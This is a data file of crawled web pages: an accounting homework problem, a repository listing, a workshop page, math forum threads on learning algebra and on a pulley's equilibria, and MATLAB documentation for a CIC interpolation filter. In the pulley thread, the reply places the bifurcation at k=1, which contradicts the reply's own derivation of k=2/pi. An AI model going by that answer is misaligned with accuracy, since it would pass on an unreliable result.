url
stringlengths
14
1.76k
text
stringlengths
100
1.02M
metadata
stringlengths
1.06k
1.1k
https://www.transtutors.com/questions/problem-12-7-roi-and-eva-85322.htm
# Problem 12-7 ROI and EVA Chapter 12 Problem 12-7 ROI and EVA [LO 6] ELN Waste Management has a subsidiary that disposes of hazardous waste and a subsidiary that collects and disposes of residential garbage. Information related to the two subsidiaries follows. Hazardous Waste Residential Waste Total assets $13,000,000$70,000,000 Noninterest-bearing current liabilities 3,000,000 12,000,000 Net income 1,700,000 6,000,000 Interest expense 1,250,000 7,300,000 Required rate of return 12% 14% Tax rate 40% 40% Required a. Calculate ROI for both subsidiaries. b. Calculate EVA for both subsidiaries. Note that since no adjustments for accounting distortions are being made, EVA is equivalent to residual income. c. Which subsidiary has added the most to shareholder value in the last year? d. Based on the limited information, which subsidiary is the best candidate for expansion? Explain. ## Related Questions in Performance Management • ### Residual in c ome, e c onomic v alue added ® . Intervilles SA operates two divisions, a Lorry (Solved) December 04, 2014 Calculate the residual income for each division using operating profit before tax and investment equal to total assets minus current liabilities. The required rate of return on investments is 12 %. 2 The company has two sources of funds: long-term debt with a market value of € 900 000 • ### Barrows Consumer Products (A) I thought evaluating performance would be easier than this. I have three vice (Solved) September 26, 2014 . Economic value added ( EVA ). c . Are there other performance measures you would suggest? How would you measure these? d . Write a one-page memo to Ms. Karlson explaining which country performed best . Be sure to explain your reasoning. I thought evaluating performance would be easier than this. I have three vice presidents, operating the same business in three different countries. I need to be able to compare them in order... • ### Problem 12-8 EVA January 22, 2012 Unit 9: Decentralization and Performance Evaluation Chapter 12 Problem 12 -8 EVA [ LO 6 ] Atomic Electronics is considering instituting a plan whereby managers will be evaluated and rewarded based on a measure of economic value added ( EVA ). Before adopting the plan, management wants you • ### divisional structure within an organisation (Solved) February 22, 2013 allow for the measurement of performance? Please use 4- 6 relevant references. Please use in text referencing. No plagiarism max tolerance of plagiarism 9%. Please use the summaries and provided article for answering your question as the grading will be based mainly on this summaries and article In order to be effective and efficient, every organization must have an organizational structure. An organizational structure is that form of structure which determines the hierarchy. The... • ### Mondelez International Inc which was formerly known as Kraft Foods Inc. is one of the leading... May 12, 2015 assets (A) 93837 75478 72557 Current liabilities ( B ) 18445 14873 14396 Capital employed ( Total assets – Current Liabilities) (A- B ) ROCE 4.69% 6 .00% 6 .83% 75392 60605 58161 10 The weighted average cost of capital of the company is 12 % whereas the return on capital employed is just 4.69% in...
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4659666121006012, "perplexity": 6449.238199544912}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221218122.85/warc/CC-MAIN-20180821112537-20180821132537-00305.warc.gz"}
https://repository.ipb.ac.id/handle/123456789/78/search-filter?filtertype_0=subject&filtertype_1=subject&filtertype_2=subject&filter_relational_operator_1=equals&filtertype_3=author&filter_relational_operator_0=equals&filtertype_4=subject&filter_2=Structural+Equation+Modeling&filter_relational_operator_3=equals&filter_1=Management&filter_relational_operator_2=equals&filter_0=Services&filter_relational_operator_4=equals&filter_4=2017&filter_3=Afif%2C+Nurullah+Sururi&field=subject&order=COUNT
Now showing items 1-9 of 1 2017 (1) Bogor-JABAR (1) interaction quality (1) Management (1) outcome quality (1) physical environment quality (1) price (1) Services (1) Structural Equation Modeling (1)
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9370996356010437, "perplexity": 24926.767022875414}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585828.15/warc/CC-MAIN-20211023224247-20211024014247-00154.warc.gz"}
http://www.msri.org/people/11603
# Mathematical Sciences Research Institute Home » Brian DeFacio Brian DeFacio 1. # WorkshopThe Feynman Integral Along with Related Topics and Applications Dec 11, 2002 Wednesday 10:30 AM - 11:30 AM Rigorous stochastic model representation for the Wilson loop observables in Chern-Simons theory Atle Hahn
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9022068381309509, "perplexity": 6899.863268751731}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257823805.20/warc/CC-MAIN-20160723071023-00318-ip-10-185-27-174.ec2.internal.warc.gz"}
http://mathhelpforum.com/algebra/199982-how-think-algebra.html
# Math Help - How to think for algebra 1. ## How to think for algebra Hello all So, I'm now out of college (English degree), but I work with engineers daily (I'm a technical writer). I would like to become better at algebra/calculus so that I can understand what's going on better. I was talking with my boss about how odd it was to work with engineers when I'm so bad at math and he asked me to explain how I "see" math. Apparently I "see" it "discreetly." For example, if you ask me how I see 2+2=4 I say I see 2 dots, I put 2 more dots on, and now there are 4 dots. I multiply by adding in groups. When you get to square roots and (especially) imaginary numbers, I instantly become lost because I can't see how you can do that to an object. Apparently he and the other engineers on staff see numbers on a continual line and there are rules you use on how to manipulate things on this line. So they see 2+2=4 by actually going up this line. There are many lines that relate to this main number line and that is where imaginary numbers apparently come in (I may be butchering what he said, it quickly got beyond me). I don't know if this helps or not, but as horrible as I was at algebra I was GREAT at geometry. I'm also great at memorization, literature, philosophy, and other humanities (except I can't draw or paint to save my life). I can discuss all sorts of abstract philosophical questions, but when it comes to math, if I can't see it, I can't do it. What I want to know is if there is a way I can teach myself to think of math on these lines instead of always having to have a concrete object to manipulate. If I could lose the dependency on having to work with a concrete object, maybe I could teach myself algebra again and understand these complex ideas that you cannot tangibly do to an object, but in theory can be used to reach tangible results. Sorry if I didn't make myself clear. I have not studied any math in years. I loved it in elementary (I can still multiply 3 digit numbers in my head), but once we broke into algebra, it was like hitting a brick wall. Now trying to tear that wall down. 2. ## Re: How to think for algebra here is a good place to start ... Resource: Algebra: In Simplest Terms 3. ## Re: How to think for algebra Im not a wizard at all when it comes to advanced math and complex formulas and the likes, although i am allways eager to learn new things and aquire new knowlede. At school i was never too good with math, mainy because it all seemed so abstract and had no root in the real world. But when designing and programming computer games i overcame and understood many consepts and methematical functions because i had a specific scenarios to work with wich interested me. I can say that for me i learnt more about math and number manipulation from game designing/ programming than i ever did at school ( if not slightly exadurating ). When i think about specific math and numbers problems ( and almost enything else ) i tend to see it as a systems rather than a prosess, and for me that helps. Im sorry for not being able to help you much, but i recently learnt about Imaginary Numbers and the Compelx Number System. I dont know your level of knowledge, but i can highly recoment you reading this, it wil definitly help you understand the Complex Number System ( Imaginary Numbers ) along with many of the major number systems: Answers and Explanations -- Do "Imaginary Numbers" Really Exist? Its short and easy to read 4. ## Re: How to think for algebra You have already been given some good advice, but just let me add that if you think Code: .. + .. = .... you are right; it's nothing to be ashamed of. Two rocks plus two rocks gives four rocks. But when you begin to deal with fractions it gets more complicated, and that's when you need the number line. Some numbers can't even be represented as whole fractions (shocking!), but they fit on the number line. Khan academy has a good reputation, is online and is free. Khan Academy (Haven't tried it myself, at least not much.)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6946517825126648, "perplexity": 807.4145152599708}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398456975.30/warc/CC-MAIN-20151124205416-00320-ip-10-71-132-137.ec2.internal.warc.gz"}
http://mathhelpforum.com/advanced-applied-math/14513-rotation-weighted-pulley.html
# Thread: rotation of a weighted pulley 1. ## rotation of a weighted pulley A light wheel of radius a has a uniform semicircular rim of mass M, and my rotate freely in a vertical plane about a horizontal axis through its center. A light string passes around the wheel and suspends a mass m. The system is governed by the equation: (M+m)a^2 (d^2(x)/dt^2)= a*g*(m -(2Msin(x))/(pi)) where x is the angle between the downward vertical and the diameter through the center of mass of the heavy rim. Find the equilibrium points and the conditions for their existence and stability. Let k = m/M. how does the wheel behave when k is large? ----------------- I have some thoughts on the problem, but I am not sure if they are right: i think when k is large, d^2(x)/dt^2 tends to g/a, which means the wheel behaves like a simple pendulum?? and one of the equilibrium points is, of course, (k,x) = (0,0). then (0, pi) and (0,2*pi) are equilibrium points as well. another observation is when k = 2/pi, sin (x) = 1. i think bifurcation occurs here, but i am not sure what would happen when k>(2/pi), becuase it seems like that means sin(x) >1... 2. Originally Posted by totoro A light wheel of radius a has a uniform semicircular rim of mass M, and my rotate freely in a vertical plane about a horizontal axis through its center. A light string passes around the wheel and suspends a mass m. The system is governed by the equation: (M+m)a^2 (d^2(x)/dt^2)= a*g*(m -(2Msin(x))/(pi)) where x is the angle between the downward vertical and the diameter through the center of mass of the heavy rim. Find the equilibrium points and the conditions for their existence and stability. Let k = m/M. how does the wheel behave when k is large? ----------------- I have some thoughts on the problem, but I am not sure if they are right: i think when k is large, d^2(x)/dt^2 tends to g/a, which means the wheel behaves like a simple pendulum?? and one of the equilibrium points is, of course, (k,x) = (0,0). then (0, pi) and (0,2*pi) are equilibrium points as well. another observation is when k = 2/pi, sin (x) = 1. i think bifurcation occurs here, but i am not sure what would happen when k>(2/pi), becuase it seems like that means sin(x) >1... At the equilibrium points all the derivatives of x are zero, so: m = 2Msin(x)/(pi) or: sin(x) = (pi/2) m/M. Now m and M are both positive, and we want x in the range [0, 2 pi), so x = arcsin((pi/2) m/M), and x = pi - arcsin((pi/2) m/M). and there are no real solutions unless (pi/2) (m/M)<=1. Or in terms of k, for equlibrium points to exist k <= 2/pi, and they are: x = arcsin((pi/2) k), and x = pi - arcsin((pi/2) k). RonL 3. thanks! so given these fixed points, i have yet to determine their stability. with only the equation of the second derivative how can i determine the stability of the fixed points? also i need to find out where the bifurcation occurs and what type they are. i don't know if there is a point, ie a value of k, such that the two fixed points found would coalesce into 1 (tangent bifurcation)? or is it another type of bifurcation? 4. Originally Posted by totoro thanks! so given these fixed points, i have yet to determine their stability. with only the equation of the second derivative how can i determine the stability of the fixed points? If x0 is one of the equilibrium points we consider a solution which starts nearby, say x(t)=x0+epsilon(t) x'(0)=0, where epsilon(t) is "small" (M+m)a^2 (d^2(x)/dt^2) ~= a*g*(m -(2M [sin(x0)-epsilon(t)cos(x0)]))/(pi)) which may be written: A d^2epsilon(t)/dt^2 ~= K1 + K2 epsilon(t) .............. ...(1), where: K1=a*g*(m - 2Msin(x0))/pi K2 = a*g*(2M)*cos(x0)/pi A=(M+m)a^2 Then the equilibrium x0 is stable if the solution of (1) is bounded (by some multiple of epsilon(0)) for all t>0, for sufficently small epsilon(0)>0. also i need to find out where the bifurcation occurs and what type they are. i don't know if there is a point, ie a value of k, such that the two fixed points found would coalesce into 1 (tangent bifurcation)? or is it another type of bifurcation? They coalesce when k=1, as then (pi/2) m/M = pi/2 and the two solutions for the equilibrium x's are equal. RonL
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9620354771614075, "perplexity": 934.6006009375182}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794867374.98/warc/CC-MAIN-20180526073410-20180526093410-00639.warc.gz"}
https://nl.mathworks.com/help/dsp/ref/dsp.cicinterpolator-system-object.html
# dsp.CICInterpolator Interpolate signal using cascaded integrator-comb filter ## Description The dsp.CICInterpolator System object™ interpolates an input signal using a cascaded integrator-comb (CIC) interpolation filter. The CIC interpolation filter structure consists of N sections of cascaded comb filters, followed by a rate change by a factor of R, followed by N sections of cascaded integrators. For details, see Algorithms. The NumSections property specifies N, the number of sections in the CIC filter. The InterpolationFactor property specifies R, the interpolation factor. The getFixedPointInfo function returns the word lengths and fraction lengths of the fixed-point sections and the output for the dsp.CICInterpolator System object. You can also generate HDL code for this System object using the generatehdl function. Note This object requires a Fixed-Point Designer™ license. To interpolate a signal using a CIC filter: 1. Create the dsp.CICInterpolator object and set its properties. 2. Call the object with arguments, as if it were a function. ## Creation ### Description example cicInterp = dsp.CICInterpolator creates a CIC interpolation System object that applies a CIC interpolation filter to the input signal. example cicInterp = dsp.CICInterpolator(R,M,N) creates a CIC interpolation object with the InterpolationFactor property set to R, the DifferentialDelay property set to M, and the NumSections property set to N. cicInterp = dsp.CICInterpolator(Name,Value) creates a CIC interpolation object with each specified property set to the specified value. Enclose each property name in single quotes. You can use this syntax with any previous input argument combinations. ## Properties expand all Unless otherwise indicated, properties are nontunable, which means you cannot change their values after calling the object. Objects lock when you call them, and the release function unlocks them. If a property is tunable, you can change its value at any time. Factor by which the input signal is interpolated, specified as a positive integer. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Differential delay value used in each of the comb sections of the filter, specified as a positive integer. For details, see Algorithms. If the differential delay is of built-in integer class data type, the interpolation factor must be the same integer data type or double. For example, if the differential delay is an int8, then the interpolation factor must be an int8 or double. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Number of integrator and comb sections of the CIC filter, specified as a positive integer. This number indicates the number of sections in either the comb part or the integrator part of the filter. The total number of sections in the CIC filter is twice the number of sections given by this property. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point property designations, specified as one of the following: • Full precision – The word length and fraction length of the CIC filter sections and the object output operate in full precision. • Minimum section word lengths – Specify the output word length through the OutputWordLength property. The object determines the filter section data type and the output fraction length that give the best possible precision. For details, see getFixedPointInfo and cicInterpOut argument. • Specify word lengths – Specify the word lengths of the CIC filter sections and the object output through the SectionWordLengths and OutputWordLength properties. The object determines the corresponding fraction lengths to give the best possible precision. For details, see getFixedPointInfo and the cicInterpOut argument. • Specify word and fraction lengths – Specify the word length and fraction length of the CIC filter sections and the object output through the SectionWordLengths, SectionFractionLengths, OutputWordLength, and OutputFractionLength properties. Fixed-point word lengths to use for each filter section, specified as a scalar or a row vector of integers. The word length must be greater than or equal to 2. If you specify a scalar, the value applies to all the sections of the filter. If you specify a vector, the vector must be of length 2 × NumSections. Example: 32 Example: [32 32 32 32] #### Dependencies This property applies when you set the FixedPointDataType property to 'Specify word lengths' or 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point fraction lengths to use for each filter section, specified as a scalar or a row vector of integers. The fraction length can be negative, 0, or positive. If you specify a scalar, the value applies to all the sections of the filter. If you specify a vector, the vector must be of length 2 × NumSections. Example: -2 Example: [-2 0 5 8] #### Dependencies This property applies when you set the FixedPointDataType property to 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point word length to use for the filter output, specified as a scalar integer greater than or equal to 2. #### Dependencies This property applies when you set the FixedPointDataType property to one of 'Minimum section word lengths', 'Specify word lengths', or 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point fraction length to use for the filter output, specified as a scalar integer. #### Dependencies This property applies when you set the FixedPointDataType property to 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 ## Usage ### Description example cicInterpOut = cicInterp(input) interpolates the input using a CIC interpolator. ### Input Arguments expand all Data input, specified as a vector or matrix. If the input is of single or double data type, property settings related to the fixed-point data types are ignored. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 | fi Complex Number Support: Yes ### Output Arguments expand all Interpolated output, returned as a vector or a matrix. The output frame size equals (InterpolationFactor) × input frame size. The complexity of the output data matches that of the input data. If the input is single or double, the output data type matches the input data type. If the input is of built-in integer data type or of fixed-point data type, the output word length and fraction length depend on the fixed-point data type setting you choose through the FixedPointDataType property. Full precision When the FixedPointDataType property is set to 'Full precision', the following relationship applies: $\begin{array}{l}W{L}_{\text{output}}=W{L}_{\text{input}}+NumSect\\ F{L}_{\text{output}}=F{L}_{\text{input}}\end{array}$ where, • WLoutput –– Word length of the output data. • FLoutput –– Fraction length of the output data. • WLinput –– Word length of the input data. • FLinput –– Fraction length of the input data. • NumSect –– Number of sections in the CIC filter specified through the NumSections property. WLinput and FLinput are inherited from the data input you pass to the object algorithm. For built-in integer inputs, the fraction length is 0. Minimum section word lengths When the FixedPointDataType property is set to 'Minimum section word lengths', the output word length is the value you specify in OutputWordLength property. The output fraction length, FLoutput is given by the following equation: $F{L}_{\text{output}}=W{L}_{\text{output}}-\left(W{L}_{\text{input}}-F{L}_{\text{input}}+NumSect\right)$ Specify word and fraction lengths When the FixedPointDataType is set to 'Specify word and fraction lengths', the output word length and fraction length are the values you specify in the OutputWordLength and OutputFractionLength properties. Specify word lengths When the FixedPointDataType is set to 'Specify word lengths', the output word length is the value you specify in the OutputWordLength property. The output fraction length, FLoutput is given by the following equation: $F{L}_{\text{output}}=W{L}_{\text{output}}-\left(W{L}_{\text{input}}-F{L}_{\text{input}}+NumSect\right)$ Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 | fi Complex Number Support: Yes ## Object Functions To use an object function, specify the System object as the first input argument. For example, to release system resources of a System object named obj, use this syntax: release(obj) expand all generatehdl Generate HDL code for quantized DSP filter (requires Filter Design HDL Coder) impz Impulse response of discrete-time filter System object freqz Frequency response of discrete-time filter System object phasez Phase response of discrete-time filter System object (unwrapped) fvtool Visualize frequency response of DSP filters gain Gain of CIC filter System object getFixedPointInfo Get fixed-point word and fraction lengths info Information about filter System object step Run System object algorithm release Release resources and allow changes to System object property values and input characteristics reset Reset internal states of System object For a list of filter analysis methods this object supports, type dsp.CICInterpolator.helpFilterAnalysis in the MATLAB® command prompt. For the corresponding function reference pages, see Analysis Methods for Filter System Objects. ## Examples collapse all Note: If you are using R2016a or an earlier release, replace each call to the object with the equivalent step syntax. For example, obj(x) becomes step(obj,x). Create a dsp.CICInterpolator System object™ with InterpolationFactor set to 2. Interpolate a fixed-point signal by a factor of 2 from 22.05 kHz to 44.1 kHz. cicint = dsp.CICInterpolator(2) cicint = dsp.CICInterpolator with properties: InterpolationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Full precision' Create a dsp.SineWave object with SampleRate set to 22.05 kHz, SamplesPerFrame set to 32, and OutputDataType set to 'Custom'. To generate a fixed-point signal, set the CustomOutputDataType property to a numerictype object. For the purpose of this example, set the value to numerictype([],16). The fraction length is computed based on the values of the generated sinusoidal signal to give the best possible precision. To generate a fixed-point signal, set the Method property of the dsp.SineWave object to 'Table lookup'. This method of generating the sinusoidal signal requires that the period of every sinusoid in the output be evenly divisible by the sample period. That is, $1/{\mathit{f}}_{\mathit{i}}{\mathit{T}}_{\mathit{s}}={\mathit{k}}_{\mathit{i}}$ must be an integer value for every channel i = 1, 2, ..., N. The value of ${\mathit{T}}_{\mathit{s}}$ equals $1/{\mathit{F}}_{\mathit{s}}$, the variable ${\mathit{f}}_{\mathit{i}}$ is the frequency of the sinusoidal signal, and ${\mathit{F}}_{\mathit{s}}$ is the sample rate of the signal. In other words, the ratio ${\mathit{F}}_{\mathit{s}}/{\mathit{f}}_{\mathit{i}}$ must be an integer. For more details, see the Algorithms section on the dsp.SineWave object page. In this example, ${\mathit{F}}_{\mathit{s}}$ is set to 22050 Hz and ${\mathit{f}}_{\mathit{i}}$ is set to 1050 Hz. Fs = 22.05e3; sine = dsp.SineWave('Frequency',1050,'SampleRate',Fs,'SamplesPerFrame',32,... 'Method','Table lookup','OutputDataType','Custom') sine = dsp.SineWave with properties: Amplitude: 1 Frequency: 1050 PhaseOffset: 0 ComplexOutput: false Method: 'Table lookup' TableOptimization: 'Speed' SampleRate: 22050 SamplesPerFrame: 32 OutputDataType: 'Custom' Show all properties In each loop of the iteration, stream in a frame of the fixed-point sinusoidal signal sampled at 22.05 kHz. Interpolate the streamed signal by a factor of 2. The interpolated output has 64 samples per frame. for i = 1:16 x = sine(); y = cicint(x); end The output of the CIC interpolation filter is amplified by a specific gain value. You can determine this value using the gain function. This gain equals the gain of the $2{\mathit{N}}^{\mathrm{th}}$ stage of the CIC interpolation filter and equals ${\left(\mathit{I}×\mathit{D}\right)}^{\mathit{N}}/\mathit{I}$, where $\mathit{I}$ is the interpolation factor, $\mathit{D}$ is the differential delay, and $\mathit{N}$ is the number of sections of the CIC interpolator. gainCIC = gain(cicint) gainCIC = 2 To adjust this amplified output and to match it to the amplitude of the original signal, divide the CIC interpolated signal with the computed gain value. Compare the last frames of the original and the interpolated signals. While plotting, account for the output latency of 2 samples. n = (0:63)'; stem(n(1:31)/Fs, double(x(1:31)),'r','filled') hold on; I = cicint.InterpolationFactor; stem(n(1:61)/(Fs*I), ... double(y(4:end))/gainCIC,'b') xlabel('Time (sec)') ylabel('Signal Amplitude') legend('Original Signal','Interpolated Signal',... 'location','north') hold off; Using the info function in the 'long' format, obtain the word lengths and fraction lengths of the fixed-point filter sections and the filter output. info(cicint,'long') ans = 'Discrete-Time FIR Multirate Filter (real) ----------------------------------------- Filter Structure : Cascaded Integrator-Comb Interpolator Interpolation Factor : 2 Differential Delay : 1 Number of Sections : 2 Stable : Yes Linear Phase : Yes (Type 1) Implementation Cost Number of Multipliers : 0 Number of States : 4 Multiplications per Input Sample : 0 Additions per Input Sample : 6 Fixed-Point Info Section word lengths : 17 17 17 17 Section fraction lengths : 14 14 14 14 Output word length : 17 Output fraction length : 14 ' Using the getFixedPointInfo function, you can determine the word lengths and fraction lengths of the fixed-point sections and the output of the dsp.CICDecimator and dsp.CICInterpolator System objects. The data types of the filter sections and the output depend on the FixedPointDataType property of the filter System object™. Full precision Create a dsp.CICDecimator object. The default value of the NumSections property is 2. This value indicates that there are two integrator and comb sections. The WLs and FLs vectors returned by the getFixedPointInfo function contain five elements each. The first two elements represent the two integrator sections. The third and fourth elements represent the two comb sections. The last element represents the filter output. cicD = dsp.CICDecimator cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Full precision' By default, the FixedPointDataType property of the object is set to 'Full precision'. Calling the getFixedPointInfo function on this object with the input numeric type, nt, yields the following word length and fraction length vectors. nt = numerictype(1,16,15) nt = DataTypeMode: Fixed-point: binary point scaling Signedness: Signed WordLength: 16 FractionLength: 15 [WLs,FLs] = getFixedPointInfo(cicD,nt) %#ok WLs = 1×5 18 18 18 18 18 FLs = 1×5 15 15 15 15 15 For details on how the word lengths and fraction lengths are computed, see the description for Output Arguments. If you lock the cicD object by passing an input to its algorithm, you do not need to pass the nt argument to the getFixedPointInfo function. input = int64(randn(8,1)) input = 8x1 int64 column vector 1 2 -2 1 0 -1 0 0 output = cicD(input) output=4×1 object 0 1 3 0 DataTypeMode: Fixed-point: binary point scaling Signedness: Signed WordLength: 66 FractionLength: 0 [WLs,FLs] = getFixedPointInfo(cicD) %#ok WLs = 1×5 66 66 66 66 66 FLs = 1×5 0 0 0 0 0 The output and section word lengths are the sum of input word length, 64 in this case, and the number of sections, 2. The output and section fraction lengths are 0 since the input is a built-in integer. Minimum section word lengths Release the object and change the FixedPointDataType property to 'Minimum section word lengths'. Determine the section and output fixed-point information when the input is fixed-point data, fi(randn(8,2),1,24,15). release(cicD); cicD.FixedPointDataType = 'Minimum section word lengths' cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Minimum section word lengths' OutputWordLength: 32 inputF = fi(randn(8,2),1,24,15) inputF=8×2 object 3.5784 -0.1241 2.7694 1.4897 -1.3499 1.4090 3.0349 1.4172 0.7254 0.6715 -0.0630 -1.2075 0.7148 0.7172 -0.2050 1.6302 DataTypeMode: Fixed-point: binary point scaling Signedness: Signed WordLength: 24 FractionLength: 15 [WLs, FLs] = getFixedPointInfo(cicD,numerictype(inputF)) %#ok WLs = 1×5 26 26 26 26 32 FLs = 1×5 15 15 15 15 21 Specify word and fraction lengths Change the FixedPointDataType property to 'Specify word and fraction lengths'. Determine the fixed-point information using the getFixedPointInfo function. cicD.FixedPointDataType = 'Specify word and fraction lengths' cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Specify word and fraction lengths' SectionWordLengths: [16 16 16 16] SectionFractionLengths: 0 OutputWordLength: 32 OutputFractionLength: 0 [WLs, FLs] = getFixedPointInfo(cicD,numerictype(inputF)) %#ok WLs = 1×5 16 16 16 16 32 FLs = 1×5 0 0 0 0 0 The section and output word lengths and fraction lengths are assigned as per the respective fixed-point properties of the cicD object. These values are not determined by the input numeric type. To confirm, call the getFixedPointInfo function without passing the numerictype input argument. [WLs, FLs] = getFixedPointInfo(cicD) %#ok WLs = 1×5 16 16 16 16 32 FLs = 1×5 0 0 0 0 0 Specify word lengths To specify the word lengths of the filter section and output, set the FixedPointDataType property to 'Specify word lengths'. cicD.FixedPointDataType = 'Specify word lengths' cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Specify word lengths' SectionWordLengths: [16 16 16 16] OutputWordLength: 32 The getFixedPointInfo function requires the input numeric type because that information is used to compute the section and word fraction lengths. [WLs, FLs] = getFixedPointInfo(cicD,numerictype(inputF)) WLs = 1×5 16 16 16 16 32 FLs = 1×5 5 5 5 5 21 For more details on how the function computes the word and fraction lengths, see the description for Output Arguments. expand all expand all ## References [1] Hogenauer, E.B. "An Economical Class of Digital Filters for Decimation and Interpolation." IEEE Transactions on Acoustics, Speech and Signal Processing. Volume 29, Number 2, 1981, 155–162. [2] Meyer-Baese, U. Digital Signal Processing with Field Programmable Gate Arrays. New York: Springer, 2001. [3] Harris, Fredric J. Multirate Signal Processing for Communication Systems. Indianapolis, IN: Prentice Hall PTR, 2004. ## Extended Capabilities ### Topics Introduced in R2012a Watch now
